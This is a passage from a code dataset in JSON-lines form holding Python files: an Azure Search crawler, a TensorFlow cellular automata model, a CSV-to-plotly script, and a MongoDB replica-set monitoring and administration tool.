'.search.windows.net/indexes/' + index +\\\n '/docs/search?api-version=' + version\n print(self.url)\n \n def searchDocuments(self, key, query={}, headers={}, meta=False, file=False):\n # ate 1000 registros\n from requests import post\n from json import dumps\n from time import time\n \n headers['api-key'] = key\n headers['content-type'] = 'application/json'\n if not query:\n query['search'] = '*'\n \n t0 = time()\n response = post(self.url, headers = headers, json = query).json()\n if not meta:\n response = response['value']\n \n print('Foram retornados', len(response), 'documentos!')\n print('Em', round(time()-t0, 3), 'segundos!')\n \n if file:\n with open(file, 'w') as fl:\n fl.write(dumps(response, indent = 2))\n print('Arquivo', file, 'criado!')\n else:\n return response\n\ndef concatFields(data, fields):\n for field in fields:\n for i in range(len(data)):\n data[i][field] = ' '.join(data[i][field])\n \n print('Campo', field, 'concatenado!')\n \n return data\n\ndef api2dataset(data, file, columns=False):\n import pandas as pd\n dataset = pd.DataFrame.from_dict(data)\n if columns:\n dataset.columns = columns\n \n dataset.to_csv(file, sep = ';', index=False, encoding='utf-8')\n print('Arquivos', file, 'criado!')\n\nif __name__ == '__main__':\n from json import loads\n config = Config('config.json')\n \n # Parametros\n service = config.service\n index = config.index\n version = config.version\n key = config.key\n query = config.query\n output = config.output\n fields = config.fields\n dataset = config.dataset\n columns = config.columns\n \n # Criar raspador\n spider = Crawler(service, index, version)\n \n # Realizar consulta\n spider.searchDocuments(key, query = query, file = output)\n\n # Transformar consulta em dataset\n data = loads(open(output).read())\n data = concatFields(data, fields) # Concatenar valores dos campos de lista em string\n api2dataset(data, dataset, columns)","sub_path":"OneWaySolution-master/01_POC_I/02_azure_search/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547123297","text":"import numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.keras.layers import Conv2D\n\nfrom utils import get_living_mask\n\n\nclass CAModel(tf.keras.Model):\n\n def __init__(self, channel_n=16, fire_rate=0.5):\n super().__init__()\n self.channel_n = channel_n\n self.fire_rate = fire_rate\n\n self.dmodel = tf.keras.Sequential([\n Conv2D(128, 1, activation=tf.nn.relu),\n Conv2D(self.channel_n, 1, activation=None,\n kernel_initializer=tf.zeros_initializer),\n ])\n\n self(tf.zeros([1, 3, 3, channel_n])) # dummy call to build the model\n\n @tf.function\n def perceive(self, x, angle=0.0):\n identify = np.float32([0, 1, 0])\n identify = np.outer(identify, identify)\n dx = np.outer([1, 2, 1], [-1, 0, 1]) / 8.0 # Sobel filter\n dy = dx.T\n c, s = tf.cos(angle), tf.sin(angle)\n kernel = tf.stack([identify, c * dx - s * dy, s * dx + c * dy], -1)[:, :, None, :]\n kernel = tf.repeat(kernel, self.channel_n, 2)\n y = tf.nn.depthwise_conv2d(x, kernel, [1, 1, 1, 1], 'SAME')\n return y\n\n @tf.function\n def call(self, x, fire_rate=None, angle=0.0, step_size=1.0):\n pre_life_mask = get_living_mask(x)\n\n y = self.perceive(x, angle)\n dx = self.dmodel(y) * step_size\n if fire_rate is None:\n fire_rate = self.fire_rate\n update_mask = tf.random.uniform(tf.shape(x[:, :, :, :1])) <= fire_rate\n x += dx * tf.cast(update_mask, tf.float32)\n\n post_life_mask = get_living_mask(x)\n life_mask = pre_life_mask & post_life_mask\n return x * tf.cast(life_mask, tf.float32)\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599733111","text":"input_file='file.csv'\nimport re\nimport numpy as np\nimport csv\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly import tools\nimport itertools\nfrom itertools import groupby\nfrom collections import defaultdict, namedtuple\n\n\n\n\n\ndef getElement(line):\n result = re.split(r',', line, maxsplit=1)\n element = result[0].strip()\n return element, result[1]\ndef getid(line):\n id, line = getElement(line)\n return id, line\ndef getname(line):\n name, line = getElement(line)\n return name, line\ndef getaddress(line):\n address, line = getElement(line)\n return address, line\ndef getCity(line):\n city, line = getElement(line)\n return city, line\ndef getState(line):\n state, line = getElement(line)\n state = state[0:].upper()\n return state, line\ndef getPostalCode(line):\n result=re.split(r',', line, maxsplit=1)\n postalcode = re.findall(r'\\d{5}', result[0])[0]\n return postalcode, result[1]\ndef getLatitude(line):\n result = re.split(r',', line, maxsplit=1)\n latitude = re.findall(r'\\d\\d\\.\\d{6}', result[1])[0]\n latitude=latitude.replace(\",\",\".\")\n return latitude, result[1]\n\ndef read_csv_line(line_number, input_file):\n with open(input_file) as fileobj:\n for i, line in enumerate(fileobj):\n if i == (line_number - 1):\n return line\n return None\n\ncolumns = defaultdict(list)\na={}\nl=[]\ntry:\n\n with open(input_file, encoding=\"utf-8\", mode='r') as file:\n line_number = 0\n dataset = dict()\n # print(dataset)\n # print(dataset.keys())\n file.readline()\n i=1\n\n for line in file:\n line = line.strip().rstrip()\n line_number += 1\n if not line:\n continue\n if line_number==20:\n break\n id, line = getElement(line)\n name, line = getElement(line)\n address, line = getElement(line)\n city, line = getCity(line)\n state, line = getState(line)\n postalcode, line = getPostalCode(line)\n latitude, line = getLatitude(line)\n l.append(latitude)\n #print(city, postalcode, latitude)\n if state in dataset:\n if city in dataset[state]:\n dataset[state][city]=[postalcode, latitude]\n if postalcode and latitude in dataset[state][city]:\n dataset[state][city]=[postalcode, latitude]\n else:\n dataset[state][city]=[]\n else:\n dataset[state]={city:[postalcode, latitude]}\n else:\n dataset[state]={city:[]}\n if i==1:\n dataset[state]={city:[postalcode, latitude]}\n i+=1\n print(dataset)\n with open(input_file) as file:\n reader = csv.DictReader(file)\n for row in reader: # read a row as {column1: value1, column2: value2,...}\n for (k, v) in row.items(): # go over each column name and value\n columns[k].append(v) # append the value into the appropriate list\n # based on column name k\n\n\nexcept IOError as e:\n print (\"I/O error({0}): {1}\".format(e.errno, e.strerror))\n\nexcept ValueError as ve:\n print(\"Value error {0} in line {1}\".format(ve, line_number))\nb=list(columns['city'])\nfor x in range(2, 23):\n a.update({x:[read_csv_line(x, input_file)]})\n#a имеет ключи начиная с 3\n\n\n\ns=list(dataset.keys())\n\nu=[]\nfor state in list(dataset.keys()):\n citu=dataset[state]\n for city in list(citu.keys()):\n u.append(city)\nbar = [go.Bar(x=s, y=u)]\nplotly.offline.plot(bar, filename='bar.html')\ntrace = [go.Scatter(x=l, y=u)]\nplotly.offline.plot(trace, filename='trace.html')\n","sub_path":"3/programm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"578554640","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: mongo_rep_admin.py\n\n Description: Administration program for Mongo replica set. The program\n has a number of functions to monitor the status of replication between\n primary and secondary databases. The program can monitor and check on\n a number of different aspects in replication to include checking master\n status, membership status, replication time lag between primary and\n secondaries, and replication configuration status.\n\n Usage:\n mongo_rep_admin.py -c file -d path\n {-L [-j [-f]] [-z] [-o dir_path/file [-a]] [-i [db:coll] -m file]\n [-e toEmail {toEmail2, [...]} [-s subject] [-u]] |\n -N [ [-f] [-e toEmail {toEmail2, [...]} [-s subject] [-u]] [-z] |\n -M | -P | -S | -T }\n [-v | -h]\n\n Arguments:\n -c file => Server configuration file. Required arg.\n -d dir path => Directory path to config file (-c). Required arg.\n\n -L => Check Replication lag.\n -j => Set output to JSON format.\n -f => Flatten the JSON data structure to file and standard out.\n -i [database:collection] => Name of database and collection.\n Delimited by colon (:). Default: sysmon:mongo_rep_lag\n -m file => Mongo config file used for the insertion into a Mongo\n database. Do not include the .py extension.\n -o path/file => Directory path and file name for output.\n Default is to overwrite the file.\n -a => Append output to output file.\n -e to_email_addresses => Sends output to one or more email\n addresses. Email addresses are space delimited.\n -s subject_line => Subject line of email.\n -u => Override the default mail command and use mailx.\n -z => Suppress standard out.\n\n -M => Show current members in replication set.\n\n -N => Node health check. Returns if a node has a problem or is down.\n -f => Flatten the JSON data structure to file and standard out.\n -e to_email_addresses => Sends output to one or more email\n addresses. Email addresses are space delimited.\n -s subject_line => Subject line of email.\n -u => Override the default mail command and use mailx.\n -z => Suppress standard out.\n\n -P => Show priority for members in replication set.\n\n -S => Check status of rep for members in rep set, but will only print\n the status if errors are detected.\n\n -T => Check status of rep for members in rep set and will print the\n status in all checks.\n\n -v => Display version of this program.\n -h => Help and usage message.\n\n NOTE 1: -v and -h overrides all other options.\n\n Notes:\n Mongo configuration file format (config/mongo.py.TEMPLATE). The\n configuration file format is for connecting to a Mongo database or\n replica set for monitoring. A second configuration file can also\n be used to connect to a Mongo database or replica set to insert the\n results of the performance monitoring into.\n\n There are two ways to connect methods: single Mongo database or a\n Mongo replica set.\n\n Single database connection:\n\n # Single Configuration file for Mongo Database Server.\n user = \"USER\"\n japd = \"PSWORD\"\n host = \"IP_ADDRESS\"\n name = \"HOSTNAME\"\n port = 27017\n conf_file = None\n auth = True\n auth_db = \"admin\"\n auth_mech = \"SCRAM-SHA-1\"\n use_arg = True\n use_uri = False\n\n Replica Set connection: Same format as above, but with these\n additional entries at the end of the configuration file. By\n default all these entries are set to None to represent not\n connecting to a replica set.\n\n repset = \"REPLICA_SET_NAME\"\n repset_hosts = \"HOST1:PORT, HOST2:PORT, HOST3:PORT, [...]\"\n db_auth = \"AUTHENTICATION_DATABASE\"\n\n Note: If using SSL connections then set one or more of the\n following entries. This will automatically enable SSL\n connections. Below are the configuration settings for SSL\n connections. See configuration file for details on each entry:\n\n ssl_client_ca = None\n ssl_client_key = None\n ssl_client_cert = None\n ssl_client_phrase = None\n\n Note: FIPS Environment for Mongo.\n If operating in a FIPS 104-2 environment, this package will\n require at least a minimum of pymongo==3.8.0 or better. It will\n also require a manual change to the auth.py module in the pymongo\n package. See below for changes to auth.py.\n\n - Locate the auth.py file python installed packages on the system\n in the pymongo package directory.\n - Edit the file and locate the \"_password_digest\" function.\n - In the \"_password_digest\" function there is an line that should\n match: \"md5hash = hashlib.md5()\". Change it to\n \"md5hash = hashlib.md5(usedforsecurity=False)\".\n - Lastly, it will require the Mongo configuration file entry\n auth_mech to be set to: SCRAM-SHA-1 or SCRAM-SHA-256.\n\n Configuration modules -> Name is runtime dependent as it can be used to\n connect to different databases with different names.\n\n Example:\n mongo_rep_admin.py -c mongo -d config -L -j\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport datetime\n\n# Third party\nimport json\n\n# Local\nimport lib.arg_parser as arg_parser\nimport lib.gen_libs as gen_libs\nimport lib.gen_class as gen_class\nimport mongo_lib.mongo_libs as mongo_libs\nimport mongo_lib.mongo_class as mongo_class\nimport version\n\n__version__ = version.__version__\n\n\ndef help_message():\n\n \"\"\"Function: help_message\n\n Description: Displays the program's docstring which is the help and usage\n message when -h option is selected.\n\n Arguments:\n\n \"\"\"\n\n print(__doc__)\n\n\ndef rep_health_chk(rep_stat, prt_all=False, prt_lvl=1):\n\n \"\"\"Function: rep_health_chk\n\n Description: Checks the replication health status for a member.\n\n Arguments:\n (input) rep_stat -> Member document from replSetGetStatus.\n (input) prt_all -> True|False - To print all or just errors.\n (input) prt_lvl -> Integer - Level at which to print message.\n\n \"\"\"\n rep_stat = dict(rep_stat)\n\n if not rep_stat.get(\"health\"):\n gen_libs.prt_msg(\"Health\", \"Bad\", prt_lvl)\n\n elif prt_all:\n gen_libs.prt_msg(\"Health\", \"Good\", prt_lvl)\n\n\ndef rep_state_chk(rep_stat, prt_all=False, prt_lvl=1):\n\n \"\"\"Function: rep_state_chk\n\n Description: Checks the state for a member. Requires the member document\n from a \"replSetGetStatus\" command to be passed to the function.\n\n Arguments:\n (input) rep_stat -> Member document from replSetGetStatus.\n (input) prt_all -> True|False - To print all or just errors.\n (input) prt_lvl -> Integer - Level at which to print message.\n\n \"\"\"\n\n # Good state is 1 (Primary), 2 (Secondary), 7 (Abriter).\n good_state = [1, 2, 7]\n rep_stat = dict(rep_stat)\n\n if rep_stat.get(\"state\") not in good_state or prt_all:\n gen_libs.prt_msg(\"State\", rep_stat.get(\"state\"), prt_lvl)\n gen_libs.prt_msg(\"State Msg\", rep_stat.get(\"stateStr\"), prt_lvl + 1)\n\n\ndef rep_msg_chk(rep_stat, prt_lvl=1):\n\n \"\"\"Function: rep_msg_chk\n\n Description: Print data if the infoMessage field is present.\n\n Arguments:\n (input) rep_stat -> Member document from replSetGetStatus.\n (input) prt_lvl -> Integer - Level at which to print message.\n\n \"\"\"\n\n rep_stat = dict(rep_stat)\n\n if rep_stat.get(\"infoMessage\"):\n gen_libs.prt_msg(\"Error Message\", rep_stat.get(\"infoMessage\"), prt_lvl)\n\n\ndef chk_rep_stat(repset, args_array, **kwargs):\n\n \"\"\"Function: chk_rep_stat\n\n Description: Fetch the replication status and process each member in the\n set.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n prt_all -> True|False on printing all status messages.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n args_array = dict(args_array)\n print(\"\\nReplication Status Check for Rep Set: %s\" % (repset.repset))\n prt_all = kwargs.get(\"prt_all\", False)\n\n # Process each member in replica set.\n for item in repset.adm_cmd(\"replSetGetStatus\").get(\"members\"):\n print(\"\\nServer: %s\" % (item.get(\"name\")))\n rep_health_chk(item, prt_all)\n rep_state_chk(item, prt_all)\n rep_msg_chk(item)\n\n return status\n\n\ndef prt_rep_stat(repset, args_array, **kwargs):\n\n \"\"\"Function: prt_rep_stat\n\n Description: Set the print all flag and call chk_rep_stat function.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n args_array = dict(args_array)\n chk_rep_stat(repset, args_array, prt_all=args_array[\"-T\"])\n\n return status\n\n\ndef fetch_priority(repset, args_array, **kwargs):\n\n \"\"\"Function: fetch_priority\n\n Description: Fetch and print members in the replication set.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n args_array = dict(args_array)\n coll = mongo_class.Coll(\n repset.name, repset.user, repset.japd, host=repset.host,\n port=repset.port, db=\"local\", coll=\"system.replset\", auth=repset.auth,\n conf_file=repset.conf_file, auth_db=repset.auth_db,\n use_arg=repset.use_arg, use_uri=repset.use_uri,\n auth_mech=repset.auth_mech)\n status = coll.connect()\n\n if status[0]:\n print(\"\\nMembers => priority of replica set: %s\" % (repset.repset))\n\n for item in coll.coll_find1()[\"members\"]:\n print(\"\\t{0} => {1}\".format(item[\"host\"], item[\"priority\"]))\n\n mongo_libs.disconnect([coll])\n\n else:\n status = (status[0],\n \"fetch_priority: Connection failure: %s\" % (status[1]))\n\n return status\n\n\ndef fetch_members(repset, args_array, **kwargs):\n\n \"\"\"Function: fetch_members\n\n Description: Fetch and print members in the replication set and identify\n the primary server.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n args_array = dict(args_array)\n print(\"\\nMembers of replica set: %s\" % (repset.repset))\n rep_status = repset.adm_cmd(\"replSetGetStatus\")\n primary = get_master(rep_status)\n print(\"\\t%s (Primary)\" % (primary[\"name\"]))\n\n secondaries = [member for member in rep_status.get(\"members\")\n if member.get(\"state\") == 2]\n\n for second in secondaries:\n print(\"\\t%s\" % (second[\"name\"]))\n\n return status\n\n\ndef get_master(rep_status):\n\n \"\"\"Function: get_master\n\n Description: Find the Primary in the replSetGetStatus document.\n\n Arguments:\n (input) rep_status -> Members document from replSetGetStatus.\n (output) primary -> Primary entry from replSetGetStatus doc.\n\n \"\"\"\n\n rep_status = dict(rep_status)\n primary = None\n\n # Process each member in replica set.\n for member in rep_status.get(\"members\"):\n if member.get(\"state\") == 1:\n primary = member\n break\n\n return primary\n\n\ndef get_optimedate(rep_status):\n\n \"\"\"Function: get_optimedate\n\n Description: Get the Best oplog date time from one of the Secondaries.\n\n Arguments:\n (input) rep_status -> Members document from replSetGetStatus.\n (output) optime_date -> Best oplog datetime from Secondaries.\n\n \"\"\"\n\n rep_status = dict(rep_status)\n optime_date = datetime.datetime.strptime(\"1900-01-01 00:00:01\",\n \"%Y-%m-%d %H:%M:%S\")\n\n # Find best datetime from Secondary servers.\n for member in rep_status.get(\"members\"):\n if member.get(\"optimeDate\") > optime_date:\n optime_date = member.get(\"optimeDate\")\n\n return optime_date\n\n\ndef chk_mem_rep_lag(rep_status, **kwargs):\n\n \"\"\"Function: chk_mem_rep_lag\n\n Description: Process each member in the replication set and check for\n replication lag.\n\n Arguments:\n (input) rep_status -> Member document from replSetGetStatus.\n (input) **kwargs:\n json -> True|False - JSON format.\n ofile -> file name - Name of output file.\n db_tbl -> database:collection - Name of db and collection.\n class_cfg -> Server class configuration settings.\n mail -> Mail instance.\n args_array -> Array of command line options and values.\n suf -> Primary|Freshest Secondary who has latest date time.\n optdt -> Primary|Best Oplog date time.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n t_format = \"%Y-%m-%d %H:%M:%S\"\n rep_status = dict(rep_status)\n json_fmt = kwargs.get(\"json\", False)\n\n outdata = {\"Application\": \"Mongo Replication\",\n \"RepSet\": rep_status.get(\"set\"),\n \"Master\": get_master(rep_status).get(\"name\"),\n \"AsOf\": datetime.datetime.strftime(datetime.datetime.now(),\n t_format),\n \"Slaves\": []}\n\n # Process each member in replica set.\n for member in rep_status.get(\"members\"):\n\n # Ignore if member is Primary or Abriter.\n if member.get(\"state\") in [1, 7]:\n continue\n\n # Fetch rep lag time.\n if member.get(\"optime\"):\n sec_ago = gen_libs.get_secs(\n kwargs[\"optdt\"] - member.get(\"optimeDate\"))\n outdata[\"Slaves\"].append(\n {\"Name\": member.get(\"name\"),\n \"SyncTo\": datetime.datetime.strftime(\n member.get(\"optimeDate\"), t_format),\n \"LagTime\": sec_ago})\n\n else:\n gen_libs.prt_msg(\"Warning\", \"No replication info available.\", 0)\n\n if json_fmt:\n status = _process_json(outdata, **kwargs)\n\n else:\n status = _process_std(outdata, **kwargs)\n\n return status\n\n\ndef _process_std(outdata, **kwargs):\n\n \"\"\"Function: _process_std\n\n Description: Private function for chk_mem_rep_lag(). Process standard out\n formatted data.\n\n Arguments:\n (input) outdata -> JSON document from chk_mem_rep_lag function.\n (input) **kwargs:\n json -> True|False - JSON format.\n ofile -> file name - Name of output file.\n db_tbl -> database:collection - Name of db and collection.\n class_cfg -> Server class configuration settings.\n mail -> Mail instance.\n args_array -> Array of command line options and values.\n suf -> Primary|Freshest Secondary who has latest date time.\n optdt -> Primary|Best Oplog date time.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n mode = \"w\"\n mongo_cfg = kwargs.get(\"class_cfg\", None)\n db_tbl = kwargs.get(\"db_tbl\", None)\n ofile = kwargs.get(\"ofile\", None)\n mail = kwargs.get(\"mail\", None)\n args_array = dict(kwargs.get(\"args_array\", {}))\n body = []\n\n if args_array.get(\"-a\", False):\n mode = \"a\"\n\n body.append(\"\\nReplication lag for Replica set: %s.\" % (outdata[\"RepSet\"]))\n\n for item in outdata[\"Slaves\"]:\n body.append(\"\\nSource: {0}\".format(item[\"Name\"]))\n body.append(\"\\tsynced to: {0}\".format(item[\"SyncTo\"]))\n body.append(\"\\t{0} secs ({1} hrs) behind the {2}\".format(\n item[\"LagTime\"], (item[\"LagTime\"] / 36) / 100, kwargs[\"suf\"]))\n\n if mongo_cfg and db_tbl:\n dbs, tbl = db_tbl.split(\":\")\n status = mongo_libs.ins_doc(mongo_cfg, dbs, tbl, outdata)\n\n if not status[0]:\n status = (status[0], \"_process_std: \" + status[1])\n\n if ofile:\n f_hldr = gen_libs.openfile(ofile, mode)\n\n for line in body:\n gen_libs.write_file2(f_hldr, line)\n\n if mail:\n for line in body:\n mail.add_2_msg(line)\n\n mail.send_mail(use_mailx=args_array.get(\"-u\", False))\n\n if not args_array.get(\"-z\", False):\n for item in body:\n print(item)\n\n return status\n\n\ndef _process_json(outdata, **kwargs):\n\n \"\"\"Function: _process_json\n\n Description: Private function for chk_mem_rep_lag(). Process JSON data.\n\n Arguments:\n (input) outdata -> JSON document from chk_mem_rep_lag function.\n (input) **kwargs:\n json -> True|False - JSON format.\n ofile -> file name - Name of output file.\n db_tbl -> database:collection - Name of db and collection.\n class_cfg -> Server class configuration settings.\n mail -> Mail instance.\n args_array -> Array of command line options and values.\n suf -> Primary|Freshest Secondary who has latest date time.\n optdt -> Primary|Best Oplog date time.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n mode = \"w\"\n indent = 4\n mongo_cfg = kwargs.get(\"class_cfg\", None)\n db_tbl = kwargs.get(\"db_tbl\", None)\n ofile = kwargs.get(\"ofile\", None)\n mail = kwargs.get(\"mail\", None)\n args_array = dict(kwargs.get(\"args_array\", {}))\n\n if args_array.get(\"-a\", False):\n mode = \"a\"\n\n if args_array.get(\"-f\", False):\n indent = None\n\n jdata = json.dumps(outdata, indent=indent)\n\n if mongo_cfg and db_tbl:\n dbs, tbl = db_tbl.split(\":\")\n status = mongo_libs.ins_doc(mongo_cfg, dbs, tbl, outdata)\n\n if not status[0]:\n status = (status[0], \"_process_json: \" + status[1])\n\n if ofile:\n gen_libs.write_file(ofile, mode, jdata)\n\n if mail:\n mail.add_2_msg(jdata)\n mail.send_mail(use_mailx=args_array.get(\"-u\", False))\n\n if not args_array.get(\"-z\", False):\n gen_libs.display_data(jdata)\n\n return status\n\n\ndef chk_rep_lag(repset, args_array, **kwargs):\n\n \"\"\"Function: chk_rep_lag\n\n Description: See if replication is running and find the best Oplog\n datetime whether Primary or Secondary.\n\n Arguments:\n (input) repset -> Replication set instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n args_array = dict(args_array)\n json_fmt = args_array.get(\"-j\", False)\n outfile = args_array.get(\"-o\", None)\n db_tbl = args_array.get(\"-i\", None)\n rep_status = repset.adm_cmd(\"replSetGetStatus\")\n primary = get_master(rep_status)\n mongo_cfg = None\n\n if args_array.get(\"-m\", None):\n mongo_cfg = gen_libs.load_module(args_array[\"-m\"], args_array[\"-d\"])\n\n if primary:\n optime_date = primary.get(\"optimeDate\")\n suffix = \"primary\"\n\n # Use best datetime from Secondaries.\n else:\n optime_date = get_optimedate(rep_status)\n suffix = \"freshest secondary\"\n\n status = chk_mem_rep_lag(\n rep_status, optdt=optime_date, suf=suffix, json=json_fmt,\n ofile=outfile, db_tbl=db_tbl, class_cfg=mongo_cfg,\n args_array=args_array, **kwargs)\n\n return status\n\n\ndef node_chk(mongo, args_array, **kwargs):\n\n \"\"\"Function: node_chk\n\n Description: Check the status of all Mongo nodes. Will only output\n something if a node is down or an error is detected.\n\n Arguments:\n (input) mongo -> Mongo instance.\n (input) args_array -> Array of command line options and values.\n (input) **kwargs:\n mail -> Mail instance.\n (output) status -> Tuple on connection status.\n status[0] - True|False - Connection successful.\n status[1] - Error message if connection failed.\n\n \"\"\"\n\n status = (True, None)\n args_array = dict(args_array)\n mail = kwargs.get(\"mail\", None)\n node_status = {}\n\n indent = None if args_array.get(\"-f\", False) else 4\n\n for node in mongo.adm_cmd(\"replSetGetStatus\").get(\"members\"):\n status2 = single_node_chk(node)\n\n if status2:\n node_status[node.get(\"name\")] = status2\n\n if node_status:\n jnode_status = json.dumps(node_status, indent=indent)\n\n if not args_array.get(\"-z\", False):\n gen_libs.display_data(jnode_status)\n\n if mail:\n if not mail.subj:\n subj = \"Node Status Check for Rep Set: %s\" % mongo.repset\n mail.create_subject(subj=subj)\n\n mail.add_2_msg(jnode_status)\n mail.send_mail(use_mailx=args_array.get(\"-u\", False))\n\n return status\n\n\ndef single_node_chk(node):\n\n \"\"\"Function: single_node_chk\n\n Description: Check the status of a single node. Will only output\n something if a node is down or an error is detected.\n\n Arguments:\n (input) node -> Dictionary of Mongo node health stats.\n (output) status -> Dictionary of node stats found.\n\n \"\"\"\n\n # Good state is 1 (Primary), 2 (Secondary), 7 (Abriter).\n good_state = [1, 2, 7]\n node = dict(node)\n status = {}\n\n if not node.get(\"health\"):\n status[\"Health\"] = \"Bad\"\n\n if node.get(\"state\") not in good_state:\n status[\"State\"] = node.get(\"state\")\n status[\"State_Message\"] = node.get(\"stateStr\")\n\n if node.get(\"infoMessage\"):\n status[\"Error_Message\"] = node.get(\"infoMessage\")\n\n return status\n\n\ndef _call_func(args_array, func_dict, repinst):\n\n \"\"\"Function: _call_func\n\n Description: Private function for run_program. Call each function\n selected.\n\n Arguments:\n (input) args_array -> Dict of command line options and values.\n (input) func_dict -> Dictionary list of functions and options.\n (input) repset -> Replication set instance.\n\n \"\"\"\n\n args_array = dict(args_array)\n func_dict = dict(func_dict)\n mail = None\n\n if args_array.get(\"-e\", None):\n mail = gen_class.setup_mail(\n args_array.get(\"-e\"), subj=args_array.get(\"-s\", None))\n\n # Call function: Intersection of command line & function dict.\n for item in set(args_array.keys()) & set(func_dict.keys()):\n status3 = func_dict[item](repinst, args_array, mail=mail)\n\n if not status3[0]:\n print(\"Error detected: %s\" % (status3[1]))\n\n\ndef run_program(args_array, func_dict):\n\n \"\"\"Function: run_program\n\n Description: Creates class instance(s) and controls flow of the program.\n\n Arguments:\n (input) args_array -> Dict of command line options and values.\n (input) func_dict -> Dictionary list of functions and options.\n\n \"\"\"\n\n args_array = dict(args_array)\n func_dict = dict(func_dict)\n server = gen_libs.load_module(args_array[\"-c\"], args_array[\"-d\"])\n\n # Only pass authorization mechanism if present.\n auth_mech = {\"auth_mech\": server.auth_mech} if hasattr(\n server, \"auth_mech\") else {}\n\n coll = mongo_class.Coll(\n server.name, server.user, server.japd, host=server.host,\n port=server.port, db=\"local\", coll=\"system.replset\", auth=server.auth,\n conf_file=server.conf_file, auth_db=server.auth_db,\n use_arg=server.use_arg, use_uri=server.use_uri, **auth_mech)\n status = coll.connect()\n\n if status[0]:\n\n # Is replication setup.\n if coll.coll_cnt() != 0:\n\n # Get replica set name if not in config.\n if server.repset:\n rep_set = server.repset\n\n else:\n rep_set = coll.coll_find1().get(\"_id\")\n\n repinst = mongo_class.RepSet(\n server.name, server.user, server.japd, host=server.host,\n port=server.port, auth=server.auth, repset=rep_set,\n repset_hosts=server.repset_hosts, auth_db=server.auth_db,\n use_arg=server.use_arg, use_uri=server.use_uri, **auth_mech)\n status2 = repinst.connect()\n\n if status2[0]:\n\n _call_func(args_array, func_dict, repinst)\n mongo_libs.disconnect([repinst])\n\n else:\n print(\"run_program.RepSet: Connection failure: %s\"\n % (status2[1]))\n\n else:\n gen_libs.prt_msg(\"Error\", \"No replication found.\", 0)\n\n mongo_libs.disconnect([coll])\n\n else:\n print(\"run_program.Coll: Connection failure: %s\" % (status[1]))\n\n\ndef main():\n\n \"\"\"Function: main\n\n Description: Initializes program-wide used variables and processes command\n line arguments and values.\n\n Variables:\n dir_chk_list -> contains options which will be directories.\n file_chk_list -> contains the options which will have files included.\n file_crt_list -> contains options which require files to be created.\n func_dict -> dictionary list for the function calls or other options.\n opt_con_req_list -> contains the options that require other options.\n opt_def_dict -> contains options with their default values.\n opt_req_list -> contains the options that are required for the program.\n opt_val_list -> contains options which require values.\n\n Arguments:\n (input) argv -> Arguments from the command line.\n\n \"\"\"\n\n cmdline = gen_libs.get_inst(sys)\n dir_chk_list = [\"-d\"]\n file_chk_list = [\"-o\"]\n file_crt_list = [\"-o\"]\n func_dict = {\"-L\": chk_rep_lag, \"-M\": fetch_members, \"-S\": chk_rep_stat,\n \"-P\": fetch_priority, \"-T\": prt_rep_stat, \"-N\": node_chk}\n opt_con_req_list = {\"-i\": [\"-m\"], \"-s\": [\"-e\"], \"-u\": [\"-e\"]}\n opt_def_dict = {\"-j\": False, \"-i\": \"sysmon:mongo_rep_lag\"}\n opt_multi_list = [\"-e\", \"-s\"]\n opt_req_list = [\"-c\", \"-d\"]\n opt_val_list = [\"-c\", \"-d\", \"-i\", \"-m\", \"-o\", \"-e\", \"-s\"]\n\n # Process argument list from command line.\n args_array = arg_parser.arg_parse2(cmdline.argv, opt_val_list,\n opt_def_dict, multi_val=opt_multi_list)\n\n if not gen_libs.help_func(args_array, __version__, help_message) \\\n and not arg_parser.arg_require(args_array, opt_req_list) \\\n and arg_parser.arg_cond_req(args_array, opt_con_req_list) \\\n and not arg_parser.arg_dir_chk_crt(args_array, dir_chk_list) \\\n and not arg_parser.arg_file_chk(args_array, file_chk_list,\n file_crt_list):\n run_program(args_array, func_dict)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"mongo_rep_admin.py","file_name":"mongo_rep_admin.py","file_ext":"py","file_size_in_byte":28410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"114289513","text":"# coding:utf-8\n\nimport logging\nimport json\nimport os.path as osp\n\nimport tornado.httpserver\nimport 